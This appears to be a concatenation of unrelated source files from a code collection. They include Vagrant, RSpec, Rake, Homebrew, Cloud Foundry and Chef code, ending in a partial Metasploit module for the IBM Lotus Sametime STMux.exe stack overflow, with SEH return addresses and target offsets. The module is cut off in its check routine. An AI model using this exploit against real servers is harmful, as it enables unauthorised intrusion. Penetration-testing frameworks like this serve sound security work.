config.vm.network :private_network, ip: settings["ip"] ||= "192.168.10.10"
#config.vm.network :public_network, ip: settings["ip"] ||= "192.168.10.10"
# Configure Additional Networks
if settings.has_key?("networks")
settings["networks"].each do |network|
config.vm.network network["type"], ip: network["ip"], bridge: network["bridge"] ||= nil
end
end
# Configure A Few VirtualBox Settings
config.vm.provider "virtualbox" do |vb|
vb.name = settings["name"] ||= "homestead-c6"
vb.customize ["modifyvm", :id, "--memory", settings["memory"] ||= "2048"]
vb.customize ["modifyvm", :id, "--cpus", settings["cpus"] ||= "1"]
vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]
vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
vb.customize ["modifyvm", :id, "--ostype", "redhat_64"]
end
# Configure A Few VMware Settings
["vmware_fusion", "vmware_workstation"].each do |vmware|
config.vm.provider vmware do |v|
v.vmx["displayName"] = "homestead-c6"
v.vmx["memsize"] = settings["memory"] ||= 2048
v.vmx["numvcpus"] = settings["cpus"] ||= 1
v.vmx["guestOS"] = "redhat_64"
end
end
# Configure A Few Parallels Settings
config.vm.provider "parallels" do |v|
v.update_guest_tools = true
v.optimize_power_consumption = false
v.memory = settings["memory"] ||= 2048
v.cpus = settings["cpus"] ||= 1
end
# Standardize Ports Naming Schema
if (settings.has_key?("ports"))
settings["ports"].each do |port|
port["guest"] ||= port["to"]
port["host"] ||= port["send"]
port["protocol"] ||= "tcp"
end
else
settings["ports"] = []
end
# Default Port Forwarding
default_ports = {
80 => 8000,
443 => 44300,
3306 => 33060,
5432 => 54320
}
# Use Default Port Forwarding Unless Overridden
default_ports.each do |guest, host|
unless settings["ports"].any? { |mapping| mapping["guest"] == guest }
config.vm.network "forwarded_port", guest: guest, host: host, auto_correct: true
end
end
# Add Custom Ports From Configuration
if settings.has_key?("ports")
settings["ports"].each do |port|
config.vm.network "forwarded_port", guest: port["guest"], host: port["host"], protocol: port["protocol"], auto_correct: true
end
end
# Configure The Public Key For SSH Access
if settings.include? 'authorize'
config.vm.provision "shell" do |s|
s.inline = "echo $1 | grep -xq \"$1\" /home/vagrant/.ssh/authorized_keys || echo $1 | tee -a /home/vagrant/.ssh/authorized_keys"
s.args = [File.read(File.expand_path(settings["authorize"]))]
end
end
# Copy The SSH Private Keys To The Box
if settings.include? 'keys'
settings["keys"].each do |key|
config.vm.provision "shell" do |s|
s.privileged = false
s.inline = "echo \"$1\" > /home/vagrant/.ssh/$2 && chmod 600 /home/vagrant/.ssh/$2"
s.args = [File.read(File.expand_path(key)), key.split('/').last]
end
end
end
# Register All Of The Configured Shared Folders
if settings.include? 'folders'
settings["folders"].each do |folder|
mount_opts = []
if (folder["type"] == "nfs")
mount_opts = folder["mount_opts"] ? folder["mount_opts"] : ['actimeo=1']
end
config.vm.synced_folder folder["map"], folder["to"], type: folder["type"] ||= nil, mount_options: mount_opts
end
end
# Install All The Configured Nginx Sites
config.vm.provision "shell" do |s|
s.path = scriptDir + "/clear-nginx.sh"
end
settings["sites"].each do |site|
type = site["type"] ||= "laravel"
if (site.has_key?("hhvm") && site["hhvm"])
type = "hhvm"
end
if (type == "symfony")
type = "symfony2"
end
config.vm.provision "shell" do |s|
s.path = scriptDir + "/serve-#{type}.sh"
s.args = [site["map"], site["to"], site["port"] ||= "80", site["ssl"] ||= "443"]
end
end
# Configure All Of The Configured Databases
if settings.has_key?("databases")
settings["databases"].each do |db|
config.vm.provision "shell" do |s|
s.path = scriptDir + "/create-mysql.sh"
s.args = [db]
end
# config.vm.provision "shell" do |s|
# s.path = scriptDir + "/create-postgres.sh"
# s.args = [db]
# end
end
end
# Configure All Of The Server Environment Variables
config.vm.provision "shell" do |s|
s.path = scriptDir + "/clear-variables.sh"
end
if settings.has_key?("variables")
settings["variables"].each do |var|
#config.vm.provision "shell" do |s|
# s.inline = "echo \"\nenv[$1] = '$2'\" >> /etc/php-fpm.d/www.conf"
# s.args = [var["key"], var["value"]]
#end
config.vm.provision "shell" do |s|
s.inline = "echo \"\n# Set Homestead Environment Variable\nexport $1=$2\" >> /home/vagrant/.profile"
s.args = [var["key"], var["value"]]
end
end
config.vm.provision "shell" do |s|
s.inline = "service php-fpm restart"
end
end
# Update Composer On Every Provision
config.vm.provision "shell" do |s|
s.inline = "/usr/local/bin/composer self-update"
end
# Configure Blackfire.io
if settings.has_key?("blackfire")
config.vm.provision "shell" do |s|
s.path = scriptDir + "/blackfire.sh"
s.args = [
settings["blackfire"][0]["id"],
settings["blackfire"][0]["token"],
settings["blackfire"][0]["client-id"],
settings["blackfire"][0]["client-token"]
]
end
end
end
end
| 32.215 | 136 | 0.582027 |
f88779ed9110d8e5444c2b9f409bffef3b33dd48 | 917 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe "CrossrefSubmissionLogs", type: :request do
let(:admin) { create(:platform_admin) }
before { sign_in(admin) }
describe "#index" do
it do
get crossref_submission_logs_path
expect(response).to render_template(:index)
end
end
describe "#show" do
let(:log) { create(:crossref_submission_log, response_xml: "<xml>Hello there!</xml>") }
context "with the correct file/field" do
it do
get crossref_submission_log_file_path(log.id, file: "response_xml")
expect(response).to render_template(:show)
expect(response.body).to match(/Hello there!/)
end
end
context "with a weird/bad file/field" do
it do
get crossref_submission_log_file_path(log.id, file: "not_a_thing")
expect(response).to have_http_status(:unauthorized)
end
end
end
end
| 25.472222 | 91 | 0.68048 |
b930a47ea13a17fd6be06ec9b323a8e235de0b80 | 2,234 | ICONS_DIR = 'public'
ORIGINAL_IMAGE = 'media/huginn-icon-square.svg'
desc "Generate site icons from #{ORIGINAL_IMAGE}"
task :icons => 'icon:all'
namespace :icon do
# iOS
task :all => :ios
[
57, 114,
60, 120, 180,
72, 144,
76, 152,
].each do |width|
sizes = '%1$dx%1$d' % width
filename = "apple-touch-icon-#{sizes}.png"
icon = File.join(ICONS_DIR, filename)
file icon => ORIGINAL_IMAGE do |t|
puts "Generating #{t.name}"
convert_image t.source, t.name, width: width
end
task :ios => icon
end
# Android
task :all => :android
android_icons = [
36, 72, 144,
48, 96, 192,
].map do |width|
sizes = '%1$dx%1$d' % width
filename = "android-chrome-#{sizes}.png" % width
icon = File.join(ICONS_DIR, filename)
file icon => ORIGINAL_IMAGE do |t|
puts "Generating #{t.name}"
convert_image t.source, t.name, width: width, round: true
end
task :android => icon
{
src: "/#{filename}",
sizes: sizes,
type: 'image/png',
density: (width / 48.0).to_s,
}
end
manifest = File.join(ICONS_DIR, 'manifest.json')
file manifest => __FILE__ do |t|
puts "Generating #{t.name}"
require 'json'
json = {
name: 'Huginn',
icons: android_icons
}
File.write(t.name, JSON.pretty_generate(json))
end
task :android => manifest
end
require 'mini_magick'
def convert_image(source, target, options = {}) # width: nil, round: false
ext = target[/(?<=\.)[^.]+\z/] || 'png'
original = MiniMagick::Image.open(source)
result = original
result.format ext
if width = options[:width]
result.thumbnail '%1$dx%1$d>' % width
else
width = result[:width]
end
if options[:round]
radius = (Rational(80, 512) * width).round
mask = MiniMagick::Image.create(ext) { |tmp| result.write(tmp) }
mask.mogrify do |image|
image.alpha 'transparent'
image.background 'none'
image.fill 'white'
image.draw 'roundrectangle 0,0,%1$d,%1$d,%2$d,%2$d' % [width, radius]
end
result = result.composite(mask) do |image|
image.alpha 'set'
image.compose 'DstIn'
end
end
result.strip
result.write(target)
end
| 21.075472 | 75 | 0.599821 |
f7d03e33a817a50f80a81d3bb3680d22377ba334 | 915 | module Fletcher
# This class extends string functions
module String
def sanitize
self.strip
end
def camelize(first_letter_in_uppercase = true)
lower_case_and_underscored_word = self.dup.underscore
if first_letter_in_uppercase
lower_case_and_underscored_word.to_s.gsub(/\/(.?)/) { "::" + $1.upcase }.gsub(/(^|_)(.)/) { $2.upcase }
else
lower_case_and_underscored_word.first + camelize(lower_case_and_underscored_word)[1..-1]
end
end
def constantize
self.split("::").inject(Module) {|acc, val| acc.const_get(val)}
end
def underscore
word = self.dup
word.gsub!(/::/, '/')
word.gsub!(/([A-Z]+)([A-Z][a-z])/,'\1_\2')
word.gsub!(/([a-z\d])([A-Z])/,'\1_\2')
word.tr!("-", "_")
word.downcase!
word
end
end
end
::String.send(:include, ::Fletcher::String)
| 26.911765 | 112 | 0.575956 |
62b2d7eb75486bc73cecc95df76f57a8af8e6a4b | 1,391 | module Tenpay
class QueryResponse
def initialize(response)
@body = response
end
def valid?
sign == Digest::MD5.hexdigest(sign_params).upcase
end
def successful?
valid? && pay_result == '0'
end
def doc
@doc ||= Hpricot(@body)
end
def attach
@attach ||= (doc / 'attach').inner_text
end
def cmdno
@cmdno ||= (doc / 'cmdno').inner_text
end
def date
@date ||= (doc / 'date').inner_text
end
def fee_type
@fee_type ||= (doc / 'fee_type').inner_text
end
def pay_info
@pay_info ||= (doc / 'pay_info').inner_text
end
def pay_result
@pay_result ||= (doc / 'pay_result').inner_text
end
def order_id
@order_id ||= (doc / 'sp_billno').inner_text
end
def total_fee
@total_fee ||= (doc / 'total_fee').inner_text
end
def transaction_id
@transaction_id ||= (doc / 'transaction_id').inner_text
end
def sign
@sign ||= (doc / 'sign').inner_text
end
private
def sign_params
"attach=#{attach}&bargainor_id=#{Tenpay::Config.spid}&cmdno=#{cmdno}&date=#{date}&fee_type=#{fee_type}" +
"&pay_info=#{pay_info}&pay_result=#{pay_result}&sp_billno=#{order_id}&total_fee=#{total_fee}&" +
"transaction_id=#{transaction_id}&key=#{Tenpay::Config.key}"
end
end
end | 21.4 | 111 | 0.583034 |
ac3ce30b8e5fa8d108b4a134aa08076149d6d671 | 1,203 | class Express < Formula
# cite Roberts_2012: "https://doi.org/10.1038/nmeth.2251"
desc "Streaming quantification for sequencing"
homepage "http://bio.math.berkeley.edu/eXpress/"
url "https://github.com/adarob/eXpress/archive/1.5.3.tar.gz"
sha256 "1c09fa067672ba2ccbac6901602f3e2d9b5e514ff1fe87f54163e94af69ff022"
head "https://github.com/adarob/eXpress.git"
bottle do
root_url "https://linuxbrew.bintray.com/bottles-bio"
cellar :any_skip_relocation
sha256 "1f8d67bf11bf49458dcfa173c13722ab83b6b9a555a2fcc27048f5409d1cdf8b" => :mojave
sha256 "aae8e9f53dc1ea615b5cafa70a954beba40abe40c0fb15026237e42ea6a86529" => :x86_64_linux
end
depends_on "bamtools" => :build
depends_on "boost" => :build
depends_on "cmake" => :build
depends_on "gperftools" => :build
depends_on "protobuf" => :build
uses_from_macos "zlib"
def install
# Use Homebrew's bamtools instead of the vendored copy
mkdir "bamtools"
ln_s Formula["bamtools"].include/"bamtools", "bamtools/include"
ln_s Formula["bamtools"].lib, "bamtools/"
system "cmake", ".", *std_cmake_args
system "make", "install"
end
test do
shell_output("#{bin}/express 2>&1", 1)
end
end
| 33.416667 | 94 | 0.732336 |
6236587968625c4c716a8aa6ac217718ec6b5b2e | 18,525 | require 'spec_helper'
module YieldHelpers
# these helpers are prefixed with an underscore to prevent
# collisions with the matchers (some of which have the same names)
def _dont_yield
end
def _yield_with_no_args
yield
end
def _yield_with_args(*args)
yield(*args)
end
end
class InstanceEvaler
include RSpec::Matchers::Extensions::InstanceEvalWithArgs
def yield_with_no_args(&block)
instance_eval_with_args(&block)
end
def yield_with_args(*args, &block)
instance_eval_with_args(*args, &block)
end
def each_arg(*args, &block)
args.each do |arg|
instance_eval_with_args(arg, &block)
end
end
end
describe "yield_control matcher" do
include YieldHelpers
extend YieldHelpers
it_behaves_like "an RSpec matcher",
:valid_value => lambda { |b| _yield_with_no_args(&b) },
:invalid_value => lambda { |b| _dont_yield(&b) } do
let(:matcher) { yield_control }
end
it 'has a description' do
expect(yield_control.description).to eq("yield control")
end
describe "expect {...}.to yield_control" do
it 'passes if the block yields, regardless of the number of yielded arguments' do
expect { |b| _yield_with_no_args(&b) }.to yield_control
expect { |b| _yield_with_args(1, 2, &b) }.to yield_control
end
it 'passes if the block yields using instance_eval' do
expect { |b| InstanceEvaler.new.yield_with_no_args(&b) }.to yield_control
end
it 'fails if the block does not yield' do
expect {
expect { |b| _dont_yield(&b) }.to yield_control
}.to fail_with(/expected given block to yield control/)
end
context "with exact count" do
it 'fails if the block yields wrong number of times' do
expect {
expect { |b| [1, 2, 3].each(&b) }.to yield_control.twice
}.to fail_with(/expected given block to yield control twice/)
expect {
expect { |b| [1, 2].each(&b) }.to yield_control.exactly(3).times
}.to fail_with(/expected given block to yield control 3 times/)
end
it 'passes if the block yields the specified number of times' do
expect { |b| [1].each(&b) }.to yield_control.once
expect { |b| [1, 2].each(&b) }.to yield_control.twice
expect { |b| [1, 2, 3].each(&b) }.to yield_control.exactly(3).times
end
end
context "with at_least count" do
it 'passes if the block yields the given number of times' do
expect { |b| [1, 2].each(&b) }.to yield_control.at_least(2).times
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(3).times
end
it 'passes if the block yields more times' do
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(2).times
expect { |b| [1, 2, 3, 4].each(&b) }.to yield_control.at_least(3).times
end
it 'allows :once and :twice to be passed as counts' do
expect { |b| [1].each(&b) }.to yield_control.at_least(:once)
expect { |b| [1, 2].each(&b) }.to yield_control.at_least(:once)
expect {
expect { |b| [].each(&b) }.to yield_control.at_least(:once)
}.to fail_with(/at least once/)
expect { |b| [1, 2].each(&b) }.to yield_control.at_least(:twice)
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(:twice)
expect {
expect { |b| [1].each(&b) }.to yield_control.at_least(:twice)
}.to fail_with(/at least twice/)
end
it 'fails if the block yields too few times' do
expect {
expect { |b| _yield_with_no_args(&b) }.to yield_control.at_least(2).times
}.to fail_with(/expected given block to yield control at least twice/)
end
end
context "with at_most count" do
it 'passes if the block yields the given number of times' do
expect { |b| [1, 2].each(&b) }.to yield_control.at_most(2).times
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(3).times
end
it 'passes if the block yields fewer times' do
expect { |b| [1, 2].each(&b) }.to yield_control.at_most(3).times
end
it 'allows :once and :twice to be passed as counts' do
expect { |b| [1].each(&b) }.to yield_control.at_most(:once)
expect {
expect { |b| [1, 2].each(&b) }.to yield_control.at_most(:once)
}.to fail_with(/expected given block to yield control at most once/)
expect { |b| [1, 2].each(&b) }.to yield_control.at_most(:twice)
expect {
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(:twice)
}.to fail_with(/expected given block to yield control at most twice/)
end
it 'fails if the block yields too many times' do
expect {
expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(2).times
}.to fail_with(/expected given block to yield control at most twice/)
end
end
end
describe "expect {...}.not_to yield_control" do
it 'passes if the block does not yield' do
expect { |b| _dont_yield(&b) }.not_to yield_control
end
it 'fails if the block does yield' do
expect {
expect { |b| _yield_with_no_args(&b) }.not_to yield_control
}.to fail_with(/expected given block not to yield control/)
end
it 'fails if the expect block does not accept an argument' do
expect {
expect { }.not_to yield_control
}.to raise_error(/expect block must accept an argument/)
end
it 'raises an error if the expect block arg is not passed to a method as a block' do
expect {
expect { |b| }.not_to yield_control
}.to raise_error(/must pass the argument.*as a block/)
end
end
end
describe "yield_with_no_args matcher" do
include YieldHelpers
extend YieldHelpers
it_behaves_like "an RSpec matcher",
:valid_value => lambda { |b| _yield_with_no_args(&b) },
:invalid_value => lambda { |b| _dont_yield(&b) } do
let(:matcher) { yield_with_no_args }
end
it 'has a description' do
expect(yield_with_no_args.description).to eq("yield with no args")
end
describe "expect {...}.to yield_with_no_args" do
it 'passes if the block yields with no args' do
expect { |b| _yield_with_no_args(&b) }.to yield_with_no_args
end
it 'passes if the block yields with no args using instance_eval' do
expect { |b| InstanceEvaler.new.yield_with_no_args(&b) }.to yield_with_no_args
end
it 'fails if the block does not yield' do
expect {
expect { |b| _dont_yield(&b) }.to yield_with_no_args
}.to fail_with(/expected given block to yield with no arguments, but did not yield/)
end
it 'fails if the block yields with args' do
expect {
expect { |b| _yield_with_args(1, &b) }.to yield_with_no_args
}.to fail_with(/expected given block to yield with no arguments, but yielded with arguments/)
end
it 'fails if the block yields with arg false' do
expect {
expect { |b| _yield_with_args(false, &b) }.to yield_with_no_args
}.to fail_with(/expected given block to yield with no arguments, but yielded with arguments/)
end
it 'raises an error if it yields multiple times' do
expect {
expect { |b| [1, 2].each(&b) }.to yield_with_no_args
}.to raise_error(/not designed.*yields multiple times/)
end
end
describe "expect {...}.not_to yield_with_no_args" do
it "passes if the block does not yield" do
expect { |b| _dont_yield(&b) }.not_to yield_with_no_args
end
it "passes if the block yields with args" do
expect { |b| _yield_with_args(1, &b) }.not_to yield_with_no_args
end
it "fails if the block yields with no args" do
expect {
expect { |b| _yield_with_no_args(&b) }.not_to yield_with_no_args
}.to fail_with(/expected given block not to yield with no arguments, but did/)
end
it 'fails if the expect block does not accept an argument' do
expect {
expect { }.not_to yield_with_no_args
}.to raise_error(/expect block must accept an argument/)
end
it 'raises an error if the expect block arg is not passed to a method as a block' do
expect {
expect { |b| }.not_to yield_with_no_args
}.to raise_error(/must pass the argument.*as a block/)
end
end
end
describe "yield_with_args matcher" do
include YieldHelpers
extend YieldHelpers
it_behaves_like "an RSpec matcher",
:valid_value => lambda { |b| _yield_with_args(1, &b) },
:invalid_value => lambda { |b| _dont_yield(&b) } do
let(:matcher) { yield_with_args }
end
it 'has a description' do
expect(yield_with_args.description).to eq("yield with args")
expect(yield_with_args(1, 3).description).to eq("yield with args(1, 3)")
expect(yield_with_args(false).description).to eq("yield with args(false)")
end
describe "expect {...}.to yield_with_args" do
it 'passes if the block yields with arguments' do
expect { |b| _yield_with_args(1, &b) }.to yield_with_args
end
it 'fails if the block does not yield' do
expect {
expect { |b| _dont_yield(&b) }.to yield_with_args
}.to fail_with(/expected given block to yield with arguments, but did not yield/)
end
it 'fails if the block yields with no arguments' do
expect {
expect { |b| _yield_with_no_args(&b) }.to yield_with_args
}.to fail_with(/expected given block to yield with arguments, but yielded with no arguments/)
end
it 'raises an error if it yields multiple times' do
expect {
expect { |b| [1, 2].each(&b) }.to yield_with_args
}.to raise_error(/not designed.*yields multiple times/)
end
end
describe "expect {...}.not_to yield_with_args" do
it 'fails if the block yields with arguments' do
expect {
expect { |b| _yield_with_args(1, &b) }.not_to yield_with_args
}.to fail_with(/expected given block not to yield with arguments, but did/)
end
it 'passes if the block does not yield' do
expect { |b| _dont_yield(&b) }.not_to yield_with_args
end
it 'passes if the block yields with no arguments' do
expect { |b| _yield_with_no_args(&b) }.not_to yield_with_args
end
it 'fails if the expect block does not accept an argument' do
expect {
expect { }.not_to yield_with_args
}.to raise_error(/expect block must accept an argument/)
end
it 'raises an error if the expect block arg is not passed to a method as a block' do
expect {
expect { |b| }.not_to yield_with_args
}.to raise_error(/must pass the argument.*as a block/)
end
end
describe "expect {...}.to yield_with_args(3, 17)" do
it 'passes if the block yields with the given arguments' do
expect { |b| _yield_with_args(3, 17, &b) }.to yield_with_args(3, 17)
end
it 'passes if the block yields with the given arguments using instance_eval' do
expect { |b| InstanceEvaler.new.yield_with_args(3, 17, &b) }.to yield_with_args(3, 17)
end
it 'fails if the block does not yield' do
expect {
expect { |b| _dont_yield(&b) }.to yield_with_args(3, 17)
}.to fail_with(/expected given block to yield with arguments, but did not yield/)
end
it 'fails if the block yields with no arguments' do
expect {
expect { |b| _yield_with_no_args(&b) }.to yield_with_args(3, 17)
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
it 'fails if the block yields with different arguments' do
expect {
expect { |b| _yield_with_args("a", "b", &b) }.to yield_with_args("a", "c")
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
end
describe "expect {...}.not_to yield_with_args(3, 17)" do
it 'passes if the block yields with different arguments' do
expect { |b| _yield_with_args("a", "b", &b) }.not_to yield_with_args("a", "c")
end
it 'fails if the block yields with the given arguments' do
expect {
expect { |b| _yield_with_args("a", "b", &b) }.not_to yield_with_args("a", "b")
}.to fail_with(/expected given block not to yield with arguments, but yielded with expected arguments/)
end
end
describe "expect {...}.to yield_with_args( false )" do
it 'passes if the block yields with the given arguments' do
expect { |b| _yield_with_args(false, &b) }.to yield_with_args(false)
end
it 'passes if the block yields with the given arguments using instance_eval' do
expect { |b| InstanceEvaler.new.yield_with_args(false, &b) }.to yield_with_args(false)
end
it 'fails if the block does not yield' do
expect {
expect { |b| _dont_yield(&b) }.to yield_with_args(false)
}.to fail_with(/expected given block to yield with arguments, but did not yield/)
end
it 'fails if the block yields with no arguments' do
expect {
expect { |b| _yield_with_no_args(&b) }.to yield_with_args(false)
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
it 'fails if the block yields with different arguments' do
expect {
expect { |b| _yield_with_args(false, &b) }.to yield_with_args(true)
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
end
describe "expect {...}.to yield_with_args(/reg/, /ex/)" do
it "passes if the block yields strings matching the regexes" do
expect { |b| _yield_with_args("regular", "expression", &b) }.to yield_with_args(/reg/, /ex/)
end
it "fails if the block yields strings that do not match the regexes" do
expect {
expect { |b| _yield_with_args("no", "match", &b) }.to yield_with_args(/reg/, /ex/)
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
end
describe "expect {...}.to yield_with_args(String, Fixnum)" do
it "passes if the block yields objects of the given types" do
expect { |b| _yield_with_args("string", 15, &b) }.to yield_with_args(String, Fixnum)
end
it "passes if the block yields the given types" do
expect { |b| _yield_with_args(String, Fixnum, &b) }.to yield_with_args(String, Fixnum)
end
it "fails if the block yields objects of different types" do
expect {
expect { |b| _yield_with_args(15, "string", &b) }.to yield_with_args(String, Fixnum)
}.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
end
end
end
describe "yield_successive_args matcher" do
include YieldHelpers
extend YieldHelpers
it_behaves_like "an RSpec matcher",
:valid_value => lambda { |b| [1, 2].each(&b) },
:invalid_value => lambda { |b| _dont_yield(&b) } do
let(:matcher) { yield_successive_args(1, 2) }
end
it 'has a description' do
expect(yield_successive_args(1, 3).description).to eq("yield successive args(1, 3)")
expect(yield_successive_args([:a, 1], [:b, 2]).description).to eq("yield successive args([:a, 1], [:b, 2])")
end
describe "expect {...}.to yield_successive_args([:a, 1], [:b, 2])" do
it 'passes when the block successively yields the given args' do
expect { |b| [ [:a, 1], [:b, 2] ].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
end
it 'fails when the block does not yield that many times' do
expect {
expect { |b| [[:a, 1]].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
}.to fail_with(/but yielded with unexpected arguments/)
end
it 'fails when the block yields the right number of times but with different arguments' do
expect {
expect { |b| [ [:a, 1], [:b, 3] ].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
}.to fail_with(/but yielded with unexpected arguments/)
end
end
describe "expect {...}.to yield_successive_args(1, 2, 3)" do
it 'passes when the block successively yields the given args' do
expect { |b| [1, 2, 3].each(&b) }.to yield_successive_args(1, 2, 3)
end
it 'passes when the block successively yields the given args using instance_eval' do
expect { |b| InstanceEvaler.new.each_arg(1, 2, 3, &b) }.to yield_successive_args(1, 2, 3)
end
it 'fails when the block does not yield the expected args' do
expect {
expect { |b| [1, 2, 4].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
}.to fail_with(/but yielded with unexpected arguments/)
end
end
describe "expect {...}.not_to yield_successive_args(1, 2, 3)" do
it 'passes when the block does not yield' do
expect { |b| _dont_yield(&b) }.not_to yield_successive_args(1, 2, 3)
end
it 'passes when the block yields the wrong number of times' do
expect { |b| [1, 2].each(&b) }.not_to yield_successive_args(1, 2, 3)
end
it 'passes when the block yields the wrong arguments' do
expect { |b| [1, 2, 4].each(&b) }.not_to yield_successive_args(1, 2, 3)
end
it 'fails when the block yields the given arguments' do
expect {
expect { |b| [1, 2, 3].each(&b) }.not_to yield_successive_args(1, 2, 3)
}.to fail_with(/expected given block not to yield successively/)
end
it 'fails if the expect block does not accept an argument' do
expect {
expect { }.not_to yield_successive_args(1, 2, 3)
}.to raise_error(/expect block must accept an argument/)
end
it 'raises an error if the expect block arg is not passed to a method as a block' do
expect {
expect { |b| }.not_to yield_successive_args(1, 2, 3)
}.to raise_error(/must pass the argument.*as a block/)
end
end
describe "expect {...}.to yield_successive_args(String, Fixnum)" do
it "passes if the block successively yields objects of the given types" do
expect { |b| ["string", 15].each(&b) }.to yield_successive_args(String, Fixnum)
end
it "passes if the block yields the given types" do
expect { |b| [String, Fixnum].each(&b) }.to yield_successive_args(String, Fixnum)
end
it "fails if the block yields objects of different types" do
expect {
expect { |b| [15, "string"].each(&b) }.to yield_successive_args(String, Fixnum)
}.to fail_with(/expected given block to yield successively with arguments/)
end
end
end
| 35.970874 | 112 | 0.650958 |
1c1b3ab2a8d7dba23f1a9e0dd033f52970baa3b8 | 2,561 | require 'presenters/v3/base_presenter'
require 'presenters/mixins/metadata_presentation_helpers'
module VCAP::CloudController::Presenters::V3
class SpaceQuotaPresenter < BasePresenter
def initialize(
resource,
show_secrets: false,
censored_message: VCAP::CloudController::Presenters::Censorship::REDACTED_CREDENTIAL,
all_spaces_visible: false,
visible_space_guids: []
)
super(resource, show_secrets: show_secrets, censored_message: censored_message)
@visible_space_guids = visible_space_guids
@all_spaces_visible = all_spaces_visible
end
def to_hash
{
guid: space_quota.guid,
created_at: space_quota.created_at,
updated_at: space_quota.updated_at,
name: space_quota.name,
apps: {
total_memory_in_mb: unlimited_to_nil(space_quota.memory_limit),
per_process_memory_in_mb: unlimited_to_nil(space_quota.instance_memory_limit),
total_instances: unlimited_to_nil(space_quota.app_instance_limit),
per_app_tasks: unlimited_to_nil(space_quota.app_task_limit),
},
services: {
paid_services_allowed: space_quota.non_basic_services_allowed,
total_service_instances: unlimited_to_nil(space_quota.total_services),
total_service_keys: unlimited_to_nil(space_quota.total_service_keys),
},
routes: {
total_routes: unlimited_to_nil(space_quota.total_routes),
total_reserved_ports: unlimited_to_nil(space_quota.total_reserved_route_ports),
},
relationships: {
organization: {
data: { guid: space_quota.organization.guid }
},
spaces: {
data: filtered_visible_spaces
}
},
links: build_links,
}
end
private
def space_quota
@resource
end
def filtered_visible_spaces
visible_spaces = if @all_spaces_visible
space_quota.spaces
else
space_quota.spaces.select { |space| @visible_space_guids.include? space.guid }
end
visible_spaces.map { |space| { guid: space.guid } }
end
def build_links
{
self: { href: url_builder.build_url(path: "/v3/space_quotas/#{space_quota.guid}") },
organization: { href: url_builder.build_url(path: "/v3/organizations/#{space_quota.organization.guid}") },
}
end
def unlimited_to_nil(value)
value == -1 ? nil : value
end
end
end
| 32.833333 | 114 | 0.654041 |
4ad3ebed6ded57c82ef1b8e0daa6db0ef19856ac | 442 | name 'tcr_db2'
maintainer 'Ed Overton'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs/Configures IBM DB2 Enterprise Server version 10.5.x with TCR datbase'
version '1.0.0'
chef_version '>= 13.0'
supports 'redhat'
supports 'centos'
issues_url 'https://github.com/emo3/tcr_db2/issues'
source_url 'https://github.com/tcr_db2/tcr_db2'
depends 'db2'
depends 'server_utils'
| 27.625 | 96 | 0.70362 |
4a70e0bd7d1e8c1bf0ef099a183c63d8ccd1fc98 | 3,727 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Lotus Domino\'s Sametime
Server. By sending an overly long POST request to the Multiplexer
STMux.exe service we are able to overwrite SEH. Based on the exploit
by Manuel Santamarina Suarez.
},
'Author' => [ 'patrick', 'riaf <riaf[at]mysec.org>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-2499' ],
[ 'OSVDB', '45610' ],
[ 'BID', '29328' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK against Windows 2003 SP1 20081114
[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
],
'DisclosureDate' => 'May 21 2008',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(1533),
], self.class)
end
def check
connect
req = "HEAD / HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
sock.put(req)
res = sock.get_once(-1,3) || ''
disconnect
if (res =~/Lotus-Domino/)
connect
req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
